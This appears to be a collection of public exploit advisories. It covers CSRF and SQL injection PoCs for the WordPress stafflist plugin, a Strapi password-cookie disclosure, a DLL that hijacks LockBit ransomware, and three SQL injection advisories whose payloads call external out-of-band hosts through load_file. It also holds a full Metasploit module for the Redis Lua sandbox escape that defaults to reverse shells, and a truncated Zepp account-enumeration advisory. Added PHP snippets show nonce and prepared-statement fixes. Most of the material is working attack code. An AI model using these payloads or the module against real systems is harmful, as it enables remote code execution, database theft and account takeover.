<pre><code># Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)<br /># Date: 05-02-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/stafflist/<br /># Version: 3.1.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Summary:<br /><br />A CSRF vulnerability exists in the staff record remove functionality of<br />WordPress Plugin Stafflist 3.1.2.<br /><br />This vulnerability allows an attacker to delete existing records by<br />triggering a CSRF HTML request, because the plugin does not validate a<br />wp_nonce token in the request.<br /><br /># Exploit<br /><br />As an authenticated user:<br /><br /><html><br /> <body><br /> <form action="http://localhost:10003/wp-admin/admin.php"><br /> <input type="hidden" name="page" value="stafflist" /><br /> <input type="hidden" name="remove" value="1" /><br /> <input type="hidden" name="p" value="1" /><br /> <input type="hidden" name="s" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
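How the remove action can be protected with the WordPress nonce API, as an added example that is not part of the advisory or of the stafflist plugin's own code. The function names, the `manage_options` capability, the table name and the assumption that `p` identifies the record to delete are all hypothetical.

```php
<?php
// Added example (hypothetical code, not the stafflist plugin's own).
// Part 1: when rendering the admin list, emit a "remove" URL that carries a
// nonce bound to the specific record. A third-party page cannot compute this
// token, so a forged form like the one in the advisory no longer matches a
// valid request.
function example_stafflist_remove_url( int $record_id ): string {
    $url = add_query_arg(
        array( 'page' => 'stafflist', 'remove' => '1', 'p' => $record_id ),
        admin_url( 'admin.php' )
    );
    // Appends &_wpnonce=<token>; the action string ties the token to this record.
    return wp_nonce_url( $url, 'stafflist_remove_' . $record_id );
}

// Part 2: the handler behind ?page=stafflist&remove=1. Check the capability
// first, then the nonce: check_admin_referer() reads $_REQUEST['_wpnonce'] and
// calls wp_die() when the token is missing or does not match the action, so a
// cross-site request stops here instead of deleting the record.
function example_stafflist_handle_remove(): void {
    if ( empty( $_GET['remove'] ) || ( $_GET['page'] ?? '' ) !== 'stafflist' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to remove staff records.', 'stafflist' ) );
    }
    // Assumption: "p" carries the record id (the advisory's PoC sends p=1).
    $record_id = isset( $_GET['p'] ) ? absint( $_GET['p'] ) : 0;
    check_admin_referer( 'stafflist_remove_' . $record_id );

    global $wpdb;
    // Hypothetical table name; $wpdb->delete() builds a prepared DELETE statement.
    $wpdb->delete( $wpdb->prefix . 'stafflist', array( 'id' => $record_id ), array( '%d' ) );
}
add_action( 'admin_init', 'example_stafflist_handle_remove' );
```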
<pre><code># Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection (Authenticated)<br /># Date: 05-02-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/stafflist/<br /># Version: 3.1.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable Code:<br /><br />$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?<br />...<br /> $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR<br /> LOWER(firstname) LIKE '%{$w}%' OR<br /> LOWER(department) LIKE '%{$w}%' OR<br /> LOWER(email) LIKE '%{$w}%'" : "");<br /><br /><br /># Vulnerable URL<br /><br />http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]<br /><br /># POC<br /><br />```<br />sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' \<br />--cookie="wordpress_cookies_paste_here"<br />```<br /><br /># POC Image<br /><br />https://prnt.sc/AECcFRHhe2ib<br /></code></pre>
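The vulnerable WHERE clause above rebuilt on $wpdb->prepare(), as an added example that is not part of the advisory or of the plugin's own code. The function name is hypothetical; the column names follow the vulnerable snippet.

```php
<?php
// Added example (hypothetical code, not the stafflist plugin's own).
// Builds the same four-column search clause as the vulnerable snippet, but
// lets $wpdb quote and escape the search term instead of interpolating it
// straight into the SQL string.
function example_stafflist_search_where( $search ): string {
    global $wpdb;

    $w = strtolower( trim( (string) $search ) );
    if ( $w === '' ) {
        return '';
    }

    // esc_like() escapes the LIKE metacharacters %, _ and \ in the user's
    // input; the surrounding wildcards are added by the code, not by the user.
    $like = '%' . $wpdb->esc_like( $w ) . '%';

    // Each %s placeholder is quoted and SQL-escaped by prepare(), so a quote in
    // the search term stays inside the string literal and cannot terminate it.
    // The returned clause can then be concatenated into the SELECT as before.
    return $wpdb->prepare(
        'WHERE LOWER(lastname) LIKE %s OR LOWER(firstname) LIKE %s '
        . 'OR LOWER(department) LIKE %s OR LOWER(email) LIKE %s',
        $like,
        $like,
        $like,
        $like
    );
}

// Usage in the admin page, replacing the interpolated $where:
// $where = example_stafflist_search_where( isset( $_GET['search'] ) ? wp_unslash( $_GET['search'] ) : '' );
```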
<pre><code># Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format<br /># Google Dork: intitle:"Welcome to your Strapi ap"<br /># Shodan search: "X-Powered-By: Strapi <strapi.io>"<br /># Date: 2022-03-30<br /># Exploit Author: Kitchaphan Singchai [idealphase]<br /># Vendor Homepage: https://strapi.io/<br /># Software Link: https://github.com/strapi/strapi/releases<br /># Vulnerable Version: < 3.6.9 and < 4.1.5<br /># Version: 3.6.8<br /># Tested on: Linux<br /># CVE: CVE-2021-46440<br /><br /># Description:<br />The DOCUMENTATION plugin component of Strapi versions prior to 3.6.9 and prior to 4.1.5 stores the documentation password in a recoverable format. An attacker who can access a victim's HTTP request can take the victim's cookie, base64-decode it and obtain the plaintext password, which gives access to the API documentation and enables further API attacks.<br /><br /># This CVE has been fixed via this GitHub pull request:<br />- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)<br /><br /># PoC:<br />[Request]<br />POST /documentation/login HTTP/1.1<br />Host: 127.0.0.1:1337<br />..[SNIP]..<br /><br />password=password<br /><br />[Response]<br />HTTP/1.1 302 Found<br />Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdlIjo4NjQwMDAwMH0=; path=/; httponly<br />Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly<br />X-Powered-By: Strapi <strapi.io><br />..[SNIP]..<br /><br />Redirecting to <a href="/documentation">/documentation</a>.<br /><br />Base64-decoding the strapi.sid cookie value yields the plaintext password in the "documentation" JSON key, as shown below.<br />{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}<br /><br /># Timeline:<br />19/Jan/2022 - Vulnerability reported to the Strapi team<br />20/Jan/2022 - Strapi validated the issue and found a fix that they planned to review, merge, and release ASAP.<br />8/Feb/2022 - Pull request created on the official Strapi GitHub - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)<br />28/Mar/2022 - CVE-2021-46440 reserved<br />29/Mar/2022 - Attempted to reproduce the vulnerability on v3.6.9 and v4.1.5 [Status: Fixed]<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.LockBit<br />Vulnerability: DLL Hijacking<br />Description: LockBit ransomware looks for and executes DLLs in its current directory. This can potentially allow us to execute our own code, and to control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if it is not, we grab our own process ID and terminate. Endpoint protection systems and/or antivirus can potentially be killed prior to executing malware, but this method cannot be, as there is nothing to kill: the DLL just lives on disk waiting. All basic tests were conducted successfully in a virtual machine environment.<br />Family: LockBit<br />Type: PE32<br />MD5: 96de05212b30ec85d4cf03386c1b84af<br />Vuln ID: MVID-2022-0572<br />Disclosure: 05/02/2022<br />Video PoC URL: https://www.youtube.com/watch?v=3i6tv4cpfSc<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll"<br />2) Place the DLL in the same directory as the LockBit ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the LockBit PE file<br /><br />#include "windows.h"<br />#include "stdio.h"<br />#include "string.h"<br /><br />//By malvuln - 5/1/2022<br />//Vuln: DLL Hijacking<br />//Target: Lockbit Ransomware<br />//MD5: 96de05212b30ec85d4cf03386c1b84af<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br />  switch (reason) {<br />  case DLL_PROCESS_ATTACH: {<br />    MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br />    //netapi32.dll is sideloaded by LockBit from its own directory, so the<br />    //current directory is the malware's folder rather than the real System32<br />    TCHAR buf[MAX_PATH];<br />    GetCurrentDirectory(MAX_PATH, buf);<br />    //printf("Current directory: %s\n", buf);<br />    int rc = strcmp("C:\\Windows\\System32", buf);<br />    if(rc != 0){<br />      //terminate the host process (the ransomware) before it starts encrypting<br />      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());<br />      if (NULL != handle) {<br />        TerminateProcess(handle, 0);<br />        CloseHandle(handle);<br />      }<br />    }<br />    break;<br />  }<br />  }<br />  return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Covid 19 Travel Pass Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.01.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management<br /><br />## Description:<br />The `code` parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'<br />was submitted in the code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system; the malicious user can also download all<br />information held by this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: code (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />OR NOT 7325=7325 AND 'vRQn'='vRQn<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT<br />(ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 10 columns<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/huye3b)<br /></code></pre>
<pre><code>## Title: Toll Tax Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.07.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system; the malicious user can also download all<br />information held by this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(select<br />load_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''<br />ELSE 0x28 END)) AND 'XhmU'='XhmU<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT<br />(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />UNION ALL SELECT<br />CONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/y9xo4q)<br /></code></pre>
<pre><code>## Title: Home Clean Service System v1.0 - 2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.27.2022<br />## Vendor: https://www.sourcecodester.com/users/acetech<br />## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System<br /><br />## Description:<br />The `password` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the password parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system; the malicious user can also download all<br />information held by this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: MULTIPART email ((custom) POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT<br />COUNT(*),CONCAT(0x7176716271,(SELECT<br />(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM<br />(SELECT(SLEEP(5)))kgBM)-- GxTm<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/l107o6)<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br />  include Msf::Exploit::CmdStager<br />  include Msf::Auxiliary::Redis<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Redis Lua Sandbox Escape',<br />        'Description' => %q{<br />          This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The<br />          vulnerability was introduced by Debian and Ubuntu Redis packages that<br />          insufficiently sanitized the Lua environment. The maintainers failed to<br />          disable the package interface, allowing attackers to load arbitrary libraries.<br /><br />          On a typical `redis` deployment (not docker), this module achieves execution<br />          as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the<br />          "MemoryDenyWriteExecute" permission, which limits some of what an attacker can<br />          do. For example, staged meterpreter will fail when attempting to use mprotect.<br />          As such, stageless meterpreter is the preferred payload.<br /><br />          Redis can be configured with authentication or not. This module will work with<br />          either configuration (provided you provide the correct authentication details).<br />          This vulnerability could theoretically be exploited across a few architectures:<br />          i386, arm, ppc, etc. However, the module only supports x86_64, which is likely<br />          to be the most popular version.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'Reginaldo Silva', # Vulnerability discovery and PoC<br />          'jbaines-r7' # Metasploit module<br />        ],<br />        'References' => [<br />          [ 'CVE', '2022-0543' ],<br />          [ 'URL', 'https://www.lua.org/pil/8.2.html'],<br />          [ 'URL', 'https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce' ],<br />          [ 'URL', 'https://www.debian.org/security/2022/dsa-5081' ],<br />          [ 'URL', 'https://ubuntu.com/security/CVE-2022-0543' ]<br />        ],<br />        'DisclosureDate' => '2022-02-18',<br />        'Platform' => ['unix', 'linux'],<br />        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br />        'Privileged' => false,<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'Payload' => {<br />              },<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_bash'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X86, ARCH_X64],<br />              'Type' => :linux_dropper,<br />              'CmdStagerFlavor' => [ 'wget'],<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'MeterpreterTryToFork' => true,<br />          'RPORT' => 6379<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />    register_options([<br />      OptString.new('TARGETURI', [true, 'Base path', '/']),<br />      OptString.new('LUA_LIB', [true, 'LUA library path', '/usr/lib/x86_64-linux-gnu/liblua5.1.so.0']),<br />      OptString.new('PASSWORD', [false, 'Redis AUTH password', 'mypassword'])<br />    ])<br />  end<br /><br />  # See https://github.com/rapid7/metasploit-framework/pull/13143<br />  def has_check?<br />    true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis<br />  end<br /><br />  # Use popen to execute the desired command and read back the output. This<br />  # is how the original PoC did it.<br />  def do_popen(cmd)<br />    exploit = "eval '" \<br />      "local io_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_io\"); " \<br />      'local io = io_l(); ' \<br />      "local f = io.popen(\"#{cmd}\", \"r\"); " \<br />      'local res = f:read("*a"); ' \<br />      'f:close(); ' \<br />      "return res' 0" \<br />      "\n"<br />    sock.put(exploit)<br />    sock.get(read_timeout)<br />  end<br /><br />  # Use os.execute to execute the desired command. This doesn't return any output, and likely<br />  # isn't meaningfully more useful than do_popen, but it demonstrates another execution<br />  # possibility not shown by the original PoC.<br />  def do_os_exec(cmd)<br />    exploit = "eval '" \<br />      "local os_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_os\"); " \<br />      'local os = os_l(); ' \<br />      "local f = os.execute(\"#{cmd}\"); " \<br />      "' 0" \<br />      "\n"<br /><br />    sock.put(exploit)<br />    sock.get(read_timeout)<br />  end<br /><br />  def check<br />    connect<br /><br />    # Before we get crazy sending exploits over the wire, let's just check if this could<br />    # plausibly be a vulnerable version. Using INFO we can check for:<br />    #<br />    # 1. 4 < Version < 6.1<br />    # 2. OS contains Linux<br />    # 3. redis_git_sha1:00000000<br />    #<br />    # We could probably fingerprint the build_id as well, but I'm worried I'll overlook a<br />    # package somewhere, and it's nice to get final verification via exploitation anyway.<br />    info_output = redis_command('INFO')<br />    return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?<br />    return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'<br />    return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'<br /><br />    redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]<br />    return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?<br />    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')<br />    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')<br />    return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'<br /><br />    # okay, looks like a worthy candidate. Attempt exploitation.<br />    result = do_popen('id')<br />    return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?<br /><br />    Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")<br />  ensure<br />    disconnect<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    connect<br /><br />    # force the redis mixin to handle auth for us<br />    info_output = redis_command('INFO')<br />    fail_with(Failure::NoAccess, 'The server did not respond') if info_output.nil?<br /><br />    # escape any single quotes<br />    cmd = cmd.gsub("'", "\\\\'")<br /><br />    # On success, there is no meaningful response. I think this is okay because we already have<br />    # solid proof of execution in check.<br />    resp = do_os_exec(cmd)<br />    fail_with(Failure::UnexpectedReply, "The server did not respond as expected: #{resp}") unless resp.nil? || resp.include?('$-1')<br />    print_good('Exploit complete!')<br />  ensure<br />    disconnect<br />  end<br /><br />  def exploit<br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    case target['Type']<br />    when :unix_cmd<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      execute_cmdstager<br />    end<br />  end<br />end<br /></code></pre>
<pre><code># Trovent Security Advisory 2108-02 #<br />#####################################<br /><br /><br />User account enumeration in password reset function<br />###################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2108-02<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2108-02<br />Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager)<br />Tested versions: Zepp 6.1.4-play<br />Vendor: Huami Inc., https://www.zepp.com<br />Credits: Trovent Security GmbH, Karima Hebbal<br /><br /><br />Detailed description<br />####################<br /><br />Zepp is a mobile application that collects health information from Zepp or Amazfit<br />devices.<br />Trovent Security GmbH discovered a user account enumeration vulnerability in<br />the password reset function of the Zepp mobile application.<br />This vulnerability allows anyone to check whether a user with a specific email<br />address is registered, because the password reset endpoint answers with a<br />different HTTP status code for registered and unregistered addresses.<br /><br />Severity: Medium<br />CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CWE ID: CWE-204<br />CVE ID: N/A<br /><br /><br />Proof of concept<br />################<br /><br />Sample HTTP request sent with a registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2<br />Host: api-user.huami.com<br />App_name: com.huami.midong<br />Accept-Language: en-US<br />X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)<br />Accept-Encoding: gzip, deflate<br />Content-Length: 0<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />The server response to a valid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/2 202 Accepted<br />Date: Mon, 30 Aug 2021 12:38:52 GMT<br />Content-Type: application/json<br />Content-Length: 39<br />Vary: Origin<br />Vary: Access-Control-Request-Method<br />Vary: Access-Control-Request-Headers<br /><br />"HuaMi Oauth / User Registration 2.0.2"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Sample HTTP request sent with a non-registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2<br />Host: api-user.huami.com<br />App_name: com.huami.midong<br />Accept-Language: en-US<br />X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: 